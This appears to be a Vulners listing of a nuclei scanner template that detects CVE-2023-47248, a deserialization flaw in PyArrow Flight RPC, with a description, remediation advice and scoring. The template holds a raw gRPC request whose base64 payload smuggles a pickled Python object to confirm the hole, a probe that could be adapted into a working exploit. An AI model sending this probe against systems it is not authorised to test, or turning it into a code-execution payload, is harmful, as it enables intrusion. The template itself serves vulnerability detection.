Lucene search
K

PyArrow Flight RPC - Remote Code Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

PyArrow Flight RPC allows remote code execution via malicious Python extension types. Upgrade necessary.

Related
Refs
Code
id: CVE-2023-47248

info:
  name: PyArrow Flight RPC - Remote Code Execution
  author: smolse
  severity: critical
  description: |
    PyArrow Flight RPC from v0.14.0 through v14.0.0 allows remote attackers to execute arbitrary code via a maliciously crafted Python-defined extension type.
  impact: |
    Unauthenticated attackers can exploit deserialization vulnerabilities through maliciously crafted Python-defined extension types in Flight RPC to execute arbitrary code and completely compromise PyArrow installations.
  remediation: |
    Upgrade to PyArrow v14.0.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47248
    - https://www.cve.org/CVERecord?id=CVE-2023-47248
    - https://github.com/apache/arrow/commit/f14170976372436ec1d03a724d8d3f3925484ecf
    - https://github.com/smolse/poc-or-gtfo/tree/main/CVE-2023-47248
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-47248
    cwe-id: CWE-502
    epss-score: 0.14414
    epss-percentile: 0.96194
    cpe: cpe:2.3:a:apache:pyarrow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: pyarrow
  tags: cve,cve2023,rce,arrow,pyarrow,apache,vkev,vuln

http:
  - raw:
      - |
        POST /arrow.flight.protocol.FlightService/DoPut HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/grpc
        Te: trailers
        Grpc-Accept-Encoding: identity, gzip, deflate

        {{base64_decode("AAAAAS0KBAgBGgASpAIQAAAAAAAKAAwABgAFAAgACgAAAAABBAAMAAAACAAIAAAABAAIAAAABAAAAAEAAAAYAAAAAAASABgACAAGAAcADAAAABAAFAASAAAAAAABDxQAAADMAAAACAAAABAAAAAAAAAAAAAAAAAAAAACAAAAVAAAAAQAAAC8////CAAAACAAAAAUAAAAQVJST1c6ZXh0ZW5zaW9uOm5hbWUAAAAAFwAAAGFycm93LnB5X2V4dGVuc2lvbl90eXBlAAgADAAEAAgACAAAAAgAAAAkAAAAGAAAAEFSUk9XOmV4dGVuc2lvbjptZXRhZGF0YQAAAAAmAAAAgASVGwAAAAAAAACMCGJ1aWx0aW5zlIwHY29tcGxleJSTlClSlC4AAAQABAAEAAAA")}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "'complex' object has no attribute 'storage_type'"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100888b4f8e1ac2965b6578d3aca394a1d4a0454dcaf16681a1221614262a05429a022016db426e4ebc9c3f4921837156d5e9b53ca7653a962727b19bc03d299cf18743:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.14414
17